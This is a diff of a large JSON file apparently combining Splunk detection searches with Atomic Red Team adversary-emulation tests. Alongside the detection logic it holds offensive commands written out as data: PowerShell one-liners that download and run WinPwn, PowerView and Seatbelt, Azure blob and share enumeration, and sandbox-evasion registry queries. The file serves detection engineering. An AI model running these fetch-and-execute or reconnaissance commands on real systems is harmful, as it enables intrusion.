"analytic_story": [ "FIN7", "AgentTesla", - "CVE-2023-21716 Word RTF Heap Corruption" + "CVE-2023-21716 Word RTF Heap Corruption", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -198188,7 +200144,7 @@ { "name": "Office Document Creating Schedule Task", "description": "this search detects a potential malicious office document that create schedule task entry through macro VBA api or through loading taskschd.dll. This technique was seen in so many malicious macro malware that create persistence , beaconing using task schedule malware entry The search will return the first time and last time the task was registered, as well as the `Command` to be executed, `Task Name`, `Author`, `Enabled`, and whether it is `Hidden` or not. schtasks.exe is natively found in `C:\\Windows\\system32` and `C:\\Windows\\syswow64`. The following DLL(s) are loaded when schtasks.exe or TaskService is launched -`taskschd.dll`. If found loaded by another process, it's possible a scheduled task is being registered within that process context in memory. Upon triage, identify the task scheduled source. Was it schtasks.exe or via TaskService? Review the job created and the Command to be executed. Capture any artifacts on disk and review. Identify any parallel processes within the same timeframe to identify source.'", - "search": "`sysmon` EventCode=7 parent_process_name IN (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\",\"onenote.exe\",\"onenotem.exe\",\"onenoteviewer.exe\",\"onenoteim.exe\", \"msaccess.exe\") ImageLoaded = \"*\\\\taskschd.dll\" | stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as AllImageLoaded count by Computer EventCode Image parent_process_name ProcessId ProcessGuid | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `office_document_creating_schedule_task_filter`", + "search": "`sysmon` EventCode=7 parent_process_name IN (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\",\"onenote.exe\",\"onenotem.exe\",\"onenoteviewer.exe\",\"onenoteim.exe\", \"msaccess.exe\") ImageLoaded = \"*\\\\taskschd.dll\" | stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as AllImageLoaded count by Computer EventCode Image parent_process_name ProcessId ProcessGuid | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `office_document_creating_schedule_task_filter`", "tags": { "name": "Office Document Creating Schedule Task", "analytic_story": [ @@ -198318,7 +200274,7 @@ { "name": "Office Document Executing Macro Code", "description": "this detection was designed to identifies suspicious office documents that using macro code. Macro code is known to be one of the prevalent weaponization or attack vector of threat actor. This malicious macro code is embed to a office document as an attachment that may execute malicious payload, download malware payload or other malware component. It is really good practice to disable macro by default to avoid automatically execute macro code while opening or closing a office document files.", - "search": "`sysmon` EventCode=7 parent_process_name IN (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\",\"onenote.exe\",\"onenotem.exe\",\"onenoteviewer.exe\",\"onenoteim.exe\",\"msaccess.exe\") ImageLoaded IN (\"*\\\\VBE7INTL.DLL\",\"*\\\\VBE7.DLL\", \"*\\\\VBEUI.DLL\") | stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as AllImageLoaded count by Computer EventCode Image process_name ProcessId ProcessGuid | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `office_document_executing_macro_code_filter`", + "search": "`sysmon` EventCode=7 parent_process_name IN (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\",\"onenote.exe\",\"onenotem.exe\",\"onenoteviewer.exe\",\"onenoteim.exe\",\"msaccess.exe\") ImageLoaded IN (\"*\\\\VBE7INTL.DLL\",\"*\\\\VBE7.DLL\", \"*\\\\VBEUI.DLL\") | stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as AllImageLoaded count by Computer EventCode Image process_name ProcessId ProcessGuid | rename Computer as dest| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `office_document_executing_macro_code_filter`", "tags": { "name": "Office Document Executing Macro Code", "analytic_story": [ @@ -198597,7 +200553,8 @@ "Qakbot", "AgentTesla", "CVE-2023-21716 Word RTF Heap Corruption", - "CVE-2023-36884 Office and Windows HTML RCE Vulnerability" + "CVE-2023-36884 Office and Windows HTML RCE Vulnerability", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -199864,7 +201821,8 @@ "Qakbot", "IcedID", "Azorult", - "Remcos" + "Remcos", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -200340,7 +202298,8 @@ "Qakbot", "IcedID", "Azorult", - "Remcos" + "Remcos", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -203005,7 +204964,7 @@ { "name": "AWS Exfiltration via Batch Service", "description": "This search looks for events where AWS Batch Service is used for creating a job that could potentially abuse the AWS Bucket Replication feature on S3 buckets. This AWS service can used to transfer data between different AWS S3 buckets and an attacker can leverage this to exfiltrate data by creating a malicious batch job.", - "search": "`cloudtrail` eventName = JobCreated | stats count min(_time) as firstTime max(_time) as lastTime values(serviceEventDetails.jobArn) as job_arn values(serviceEventDetails.status) as status by src_ip aws_account_id eventName errorCode userAgent| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_exfiltration_via_datasync_task_filter`", + "search": "`cloudtrail` eventName = JobCreated | stats count min(_time) as firstTime max(_time) as lastTime values(serviceEventDetails.jobArn) as job_arn values(serviceEventDetails.status) as status by src_ip aws_account_id eventName errorCode userAgent| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_exfiltration_via_datasync_task_filter`", "tags": { "name": "AWS Exfiltration via Batch Service", "analytic_story": [ @@ -203018,7 +204977,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "AWS Batch Job is created on account id - $aws_account_id$ by user $user_arn$ from src_ip $src_ip$", + "message": "AWS Batch Job is created on account id - $aws_account_id$ from src_ip $src_ip$", "mitre_attack_id": [ "T1119" ], @@ -203026,13 +204985,6 @@ "DE.CM" ], "observable": [ - { - "name": "user_arn", - "type": "User", - "role": [ - "Attacker" - ] - }, { "name": "src_ip", "type": "IP Address", @@ -203632,7 +205584,7 @@ { "name": "Windows ClipBoard Data via Get-ClipBoard", "description": "The following analytic identifies a powershell script command to retrieve clipboard data. This technique was seen in several post exploitation tools like WINPEAS to steal sensitive information that was saved in clipboard. Using the Get-Clipboard powershell commandlet, adversaries can be able collect data stored in clipboard that might be a copied user name, password or other sensitive information.", - "search": "`powershell` EventCode=4104 ScriptBlockText = \"*Get-Clipboard*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_clipboard_data_via_get_clipboard_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText = \"*Get-Clipboard*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_clipboard_data_via_get_clipboard_filter`", "tags": { "name": "Windows ClipBoard Data via Get-ClipBoard", "analytic_story": [ @@ -203646,7 +205598,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "powershell script $ScriptBlockText$ execute Get-Clipboard commandlet in $dest$", + "message": "Powershell script $ScriptBlockText$ execute Get-Clipboard commandlet on $dest$", "mitre_attack_id": [ "T1115" ], @@ -203655,14 +205607,14 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] }, { - "name": "UserID", + "name": "user", "type": "User", "role": [ "Victim" @@ -203703,7 +205655,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An increase of Windows Post Exploitation behavior has been detected on $affected_systems$", + "message": "An increase of Windows Post Exploitation behavior has been detected on $risk_object$", "mitre_attack_id": [ "T1012", "T1049", @@ -203719,7 +205671,7 @@ ], "observable": [ { - "name": "affected_systems", + "name": "risk_object", "type": "Hostname", "role": [ "Victim" @@ -206780,12 +208732,12 @@ { "description": "tshark must be installed and in the default path of \"c:\\Program Files\\Wireshark\\Tshark.exe\".\n", "prereq_command": "if (test-path \"#{tshark_path}\") {exit 0} else {exit 1}", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\wireshark_installer.exe #{wireshark_url}\nStart-Process PathToAtomicsFolder\\..\\ExternalPayloads\\wireshark_installer.exe /S\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\wireshark_installer.exe\" #{wireshark_url}\nStart-Process \"PathToAtomicsFolder\\..\\ExternalPayloads\\wireshark_installer.exe\" /S\n" }, { "description": "npcap must be installed.\n", "prereq_command": "if (test-path \"#{npcap_path}\") {exit 0} else {exit 1}", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\npcap_installer.exe #{npcap_url}\nStart-Process PathToAtomicsFolder\\..\\ExternalPayloads\\npcap_installer.exe\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\npcap_installer.exe\" #{npcap_url}\nStart-Process \"PathToAtomicsFolder\\..\\ExternalPayloads\\npcap_installer.exe\"\n" } ], "executor": { @@ -207874,7 +209826,7 @@ } ], "command_list": [ - "import-module \"\\..\\ExternalPayloads\\Invoke-EnumerateAzureBlobs.ps1\"\nInvoke-EnumerateAzureBlobs -base secure -permutations \\..\\ExternalPayloads\\permutations.txt -outputfile \"$env:temp\\T1530Test1.txt\"\n", + "import-module \"\\..\\ExternalPayloads\\Invoke-EnumerateAzureBlobs.ps1\"\nInvoke-EnumerateAzureBlobs -base secure -permutations \"\\..\\ExternalPayloads\\permutations.txt\" -outputfile \"$env:temp\\T1530Test1.txt\"\n", "try{$response = invoke-webrequest \"https://T1530Test2.blob.core.windows.net/#{container_name}/#{blob_name}\" -method \"GET\"}\ncatch [system.net.webexception]\n{if($_.Exception.Response -ne $null)\n{$Response = $_.Exception.Response.GetResponseStream()\n$ReadResponse = New-Object System.IO.StreamReader($Response)\n$ReadResponse.BaseStream.Position = 0\n$responseBody = $ReadResponse.ReadToEnd()}\nelse {$responseBody = \"The storage account could not be anonymously accessed.\"}}\n\"Response received for T1530Test2.blob.core.windows.net/#{container_name}/#{blob_name}: $responsebody\" | out-file -filepath $env:temp\\T1530Test2.txt -append\n", "aws --no-sign-request s3 cp --recursive s3://redatomic-test2 /tmp/redatomic-test2\n" ], @@ -207916,17 +209868,17 @@ "dependencies": [ { "description": "The Invoke-EnumerateAzureBlobs module must exist in PathToAtomicsFolder\\..\\ExternalPayloads.\n", - "prereq_command": "if (test-path PathToAtomicsFolder\\..\\ExternalPayloads\\Invoke-EnumerateAzureBlobs.ps1){exit 0} else {exit 1}\n", + "prereq_command": "if (test-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\Invoke-EnumerateAzureBlobs.ps1\"){exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\ninvoke-webrequest \"https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\Invoke-EnumerateAzureBlobs.ps1\"\n" }, { "description": "The wordlist file for search permutations must exist in PathToAtomicsFolder\\..\\ExternalPayloads.\n", - "prereq_command": "if (test-path #{wordlist}){exit 0} else {exit 1}\n", + "prereq_command": "if (test-path \"#{wordlist}\"){exit 0} else {exit 1}\n", "get_prereq_command": "invoke-webrequest \"https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/permutations.txt\" -outfile \"#{wordlist}\"\n" } ], "executor": { - "command": "import-module \"PathToAtomicsFolder\\..\\ExternalPayloads\\Invoke-EnumerateAzureBlobs.ps1\"\nInvoke-EnumerateAzureBlobs -base #{base} -permutations #{wordlist} -outputfile \"#{output_file}\"\n", + "command": "import-module \"PathToAtomicsFolder\\..\\ExternalPayloads\\Invoke-EnumerateAzureBlobs.ps1\"\nInvoke-EnumerateAzureBlobs -base #{base} -permutations \"#{wordlist}\" -outputfile \"#{output_file}\"\n", "cleanup_command": "remove-item #{output_file} -erroraction silentlycontinue\n", "name": "powershell" } @@ -208090,10 +210042,10 @@ ], "observable": [ { - "name": "dest", - "type": "Other", + "name": "remote_ip", + "type": "IP Address", "role": [ - "Other" + "Attacker" ] } ], @@ -208300,10 +210252,10 @@ ], "observable": [ { - "name": "dest", - "type": "Other", + "name": "src_ip", + "type": "IP Address", "role": [ - "Other" + "Attacker" ] } ], @@ -209334,7 +211286,7 @@ { "name": "Add DefaultUser And Password In Registry", "description": "this search is to detect a suspicious registry modification to implement auto admin logon to a host. This technique was seen in BlackMatter ransomware to automatically logon to the compromise host after triggering a safemode boot to continue encrypting the whole network. This behavior is not a common practice and really a suspicious TTP or alert need to be consider if found within then network premise.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon*\" AND Registry.registry_value_name= DefaultPassword OR Registry.registry_value_name= DefaultUserName) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `add_defaultuser_and_password_in_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon*\" AND Registry.registry_value_name= DefaultPassword OR Registry.registry_value_name= DefaultUserName) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.dest Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `add_defaultuser_and_password_in_registry_filter`", "tags": { "name": "Add DefaultUser And Password In Registry", "analytic_story": [ @@ -209392,7 +211344,7 @@ { "name": "Auto Admin Logon Registry Entry", "description": "this search is to detect a suspicious registry modification to implement auto admin logon to a host. This technique was seen in BlackMatter ransomware to automatically logon to the compromise host after triggering a safemode boot to continue encrypting the whole network. This behavior is not a common practice and really a suspicious TTP or alert need to be consider if found within then network premise.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon*\" AND Registry.registry_value_name=AutoAdminLogon AND Registry.registry_value_data=1) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `auto_admin_logon_registry_entry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon*\" AND Registry.registry_value_name=AutoAdminLogon AND Registry.registry_value_data=1) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `auto_admin_logon_registry_entry_filter`", "tags": { "name": "Auto Admin Logon Registry Entry", "analytic_story": [ @@ -209631,7 +211583,7 @@ "get-smbshare\n", "net share\n", "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose\n", - "Import-Module \\..\\ExternalPayloads\\PowerView.ps1\nInvoke-ShareFinder -CheckShareAccess\n", + "Import-Module \"\\..\\ExternalPayloads\\PowerView.ps1\"\nInvoke-ShareFinder -CheckShareAccess\n", "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nshareenumeration -noninteractive -consoleoutput", "dir \\\\127.0.0.1\\c$\ndir \\\\127.0.0.1\\admin$\ndir \\\\127.0.0.1\\IPC$\n", "powershell/situational_awareness/network/powerview/get_dfs_share", @@ -209876,12 +211828,12 @@ "dependencies": [ { "description": "Invoke-ShareFinder module must exist in %TEMP% directory", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\PowerView.ps1) {exit 0} else {exit 1}", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1\" -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\PowerView.ps1\n" + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\PowerView.ps1\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PowerView.ps1\"\n" } ], "executor": { - "command": "Import-Module PathToAtomicsFolder\\..\\ExternalPayloads\\PowerView.ps1\nInvoke-ShareFinder #{parameters}\n", + "command": "Import-Module \"PathToAtomicsFolder\\..\\ExternalPayloads\\PowerView.ps1\"\nInvoke-ShareFinder #{parameters}\n", "name": "powershell" } }, @@ -213147,7 +215099,7 @@ "hostname\n", "hostname\n", "REG QUERY HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography /v MachineGuid\n", - "cscript \\T1082\\src\\griffon_recon.vbs", + "cscript \"\\T1082\\src\\griffon_recon.vbs\"\n", "set\n", "env\n", "csrutil status\n", @@ -213161,10 +215113,13 @@ "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')\nInvoke-watson", "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')\nInvoke-SharpUp -command \"audit\"", "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')\nInvoke-Seatbelt -Command \"-group=all\"; pause", - "Import-Module \\..\\ExternalPayloads\\AzureStealth.ps1 -force \n$Password = ConvertTo-SecureString -String \"T1082Az\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Password\nConnect-AzAccount -Credential $Credential\nConnect-AzureAD -Credential $Credential\nScan-AzureAdmins -UseCurrentCred\n", + "Import-Module \"\\..\\ExternalPayloads\\AzureStealth.ps1\" -force \n$Password = ConvertTo-SecureString -String \"T1082Az\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Password\nConnect-AzAccount -Credential $Credential\nConnect-AzureAD -Credential $Credential\nScan-AzureAdmins -UseCurrentCred\n", "lsmod\nkmod list\ngrep vmw /proc/modules\n", - "wmic cpu get name\nwmic MEMPHYSICAL get MaxCapacity\nwmic baseboard get product\nwmic baseboard get version\nwmic bios get SMBIOSBIOSVersion\nwmic path win32_VideoController get name\nwmic path win32_VideoController get DriverVersion\nwmic path win32_VideoController get VideoModeDescription\nwmic OS get Caption,OSArchitecture,Version\nwmic DISKDRIVE get Caption\n", + "wmic cpu get name\nwmic MEMPHYSICAL get MaxCapacity\nwmic baseboard get product\nwmic baseboard get version\nwmic bios get SMBIOSBIOSVersion\nwmic path win32_VideoController get name\nwmic path win32_VideoController get DriverVersion\nwmic path win32_VideoController get VideoModeDescription\nwmic OS get Caption,OSArchitecture,Version\nwmic DISKDRIVE get Caption\nGet-WmiObject win32_bios\n", "driverquery /v\ndriverquery /si\n", + "wscript.exe C:\\Windows\\System32\\gatherNetworkInfo.vbs\n", + "reg query \"HKEY_CURRENT_USER\\Control Panel\\International\\Geo\"\n", + "reg query HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System /v SystemBiosVersion\nreg query HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System /v VideoBiosVersion\n", "powershell/situational_awareness/host/computerdetails", "powershell/situational_awareness/host/winenum", "powershell/situational_awareness/network/powerview/get_computer", @@ -213399,12 +215354,12 @@ "dependencies": [ { "description": "Sample script file must exist on disk at specified location (#{vbscript})\n", - "prereq_command": "if (Test-Path #{vbscript}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{vbscript}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1082/src/griffon_recon.vbs\" -OutFile \"#{vbscript}\"\n" + "prereq_command": "if (Test-Path \"#{vbscript}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{vbscript}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1082/src/griffon_recon.vbs\" -OutFile \"#{vbscript}\"\n" } ], "executor": { - "command": "cscript #{vbscript}", + "command": "cscript \"#{vbscript}\"\n", "name": "powershell", "elevation_required": false } @@ -213590,7 +215545,7 @@ "dependencies": [ { "description": "The SkyArk AzureStealth module must exist in PathToAtomicsFolder\\..\\ExternalPayloads.\n", - "prereq_command": "if (test-path PathToAtomicsFolder\\..\\ExternalPayloads\\AzureStealth.ps1){exit 0} else {exit 1}\n", + "prereq_command": "if (test-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AzureStealth.ps1\"){exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\ninvoke-webrequest \"https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\AzureStealth.ps1\"\n" }, { @@ -213605,7 +215560,7 @@ } ], "executor": { - "command": "Import-Module PathToAtomicsFolder\\..\\ExternalPayloads\\AzureStealth.ps1 -force \n$Password = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Password\nConnect-AzAccount -Credential $Credential\nConnect-AzureAD -Credential $Credential\nScan-AzureAdmins -UseCurrentCred\n", + "command": "Import-Module \"PathToAtomicsFolder\\..\\ExternalPayloads\\AzureStealth.ps1\" -force \n$Password = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Password\nConnect-AzAccount -Credential $Credential\nConnect-AzureAD -Credential $Credential\nScan-AzureAdmins -UseCurrentCred\n", "cleanup_command": "$resultstime = Get-Date -Format \"yyyyMMdd\"\n$resultsfolder = (\"Results-\" + $resultstime)\nremove-item $env:temp\\$resultsfolder -recurse -force -erroraction silentlycontinue\n", "name": "powershell", "elevation_required": true @@ -213631,7 +215586,7 @@ "windows" ], "executor": { - "command": "wmic cpu get name\nwmic MEMPHYSICAL get MaxCapacity\nwmic baseboard get product\nwmic baseboard get version\nwmic bios get SMBIOSBIOSVersion\nwmic path win32_VideoController get name\nwmic path win32_VideoController get DriverVersion\nwmic path win32_VideoController get VideoModeDescription\nwmic OS get Caption,OSArchitecture,Version\nwmic DISKDRIVE get Caption\n", + "command": "wmic cpu get name\nwmic MEMPHYSICAL get MaxCapacity\nwmic baseboard get product\nwmic baseboard get version\nwmic bios get SMBIOSBIOSVersion\nwmic path win32_VideoController get name\nwmic path win32_VideoController get DriverVersion\nwmic path win32_VideoController get VideoModeDescription\nwmic OS get Caption,OSArchitecture,Version\nwmic DISKDRIVE get Caption\nGet-WmiObject win32_bios\n", "name": "command_prompt" } }, @@ -213646,6 +215601,43 @@ "command": "driverquery /v\ndriverquery /si\n", "name": "command_prompt" } + }, + { + "name": "System Information Discovery", + "auto_generated_guid": "4060ee98-01ae-4c8e-8aad-af8300519cc7", + "description": "The script gathernetworkinfo.vbs is employed to collect system information such as the operating system, DNS details, firewall configuration, etc. Outputs are stored in c:\\Windows\\System32\\config or c:\\Windows\\System32\\reg. https://www.verboon.info/2011/06/the-gathernetworkinfo-vbs-script/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wscript.exe C:\\Windows\\System32\\gatherNetworkInfo.vbs\n", + "elevation_required": true, + "name": "command_prompt" + } + }, + { + "name": "Check computer location", + "auto_generated_guid": "96be6002-9200-47db-94cb-c3e27de1cb36", + "description": "Looks up country code configured in the registry, likely geofence. Upon execution, country code info will be displayed.\n- https://tria.ge/210111-eaz8mqhgh6/behavioral1\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg query \"HKEY_CURRENT_USER\\Control Panel\\International\\Geo\"\n", + "name": "command_prompt" + } + }, + { + "name": "BIOS Information Discovery through Registry", + "auto_generated_guid": "f2f91612-d904-49d7-87c2-6c165d23bead", + "description": "Looks up for BIOS information in the registry. BIOS information is often read in order to detect sandboxing environments. Upon execution, BIOS information will be displayed.\n- https://tria.ge/210111-eaz8mqhgh6/behavioral1\n- https://evasions.checkpoint.com/techniques/registry.html\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg query HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System /v SystemBiosVersion\nreg query HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System /v VideoBiosVersion\n", + "name": "command_prompt" + } } ] } @@ -214229,7 +216221,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "Potential system information discovery behavior on $dest$ by $User$", + "message": "Potential system information discovery behavior on $dest$ by $user$", "mitre_attack_id": [ "T1082" ], @@ -214245,7 +216237,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Attacker" @@ -214409,7 +216401,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An increase of Windows Post Exploitation behavior has been detected on $affected_systems$", + "message": "An increase of Windows Post Exploitation behavior has been detected on $risk_object$", "mitre_attack_id": [ "T1012", "T1049", @@ -214425,7 +216417,7 @@ ], "observable": [ { - "name": "affected_systems", + "name": "risk_object", "type": "Hostname", "role": [ "Victim" @@ -219236,7 +221228,7 @@ "Installation", "Exploitation" ], - "message": "Suspicious scheduled task registered on $dest$", + "message": "Suspicious scheduled task registered on $dest$ from Public Directory", "mitre_attack_id": [ "T1053.005", "T1053" @@ -219253,7 +221245,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -219844,7 +221836,8 @@ "Winter Vivern", "Ryuk Ransomware", "CISA AA22-257A", - "Scheduled Tasks" + "Scheduled Tasks", + "Windows Error Reporting Service Elevation of Privilege Vulnerability" ], "asset_type": "Endpoint", "cis20": [ @@ -220297,8 +222290,8 @@ "dependencies": [ { "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", - "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{msi_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi\" -OutFile \"#{msi_payload}\"\n" + "prereq_command": "if (Test-Path \"#{msi_payload}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{msi_payload}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi\" -OutFile \"#{msi_payload}\"\n" } ], "executor": { @@ -220334,8 +222327,8 @@ "dependencies": [ { "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", - "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{msi_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_VBScript.msi\" -OutFile \"#{msi_payload}\"\n" + "prereq_command": "if (Test-Path \"#{msi_payload}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{msi_payload}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest 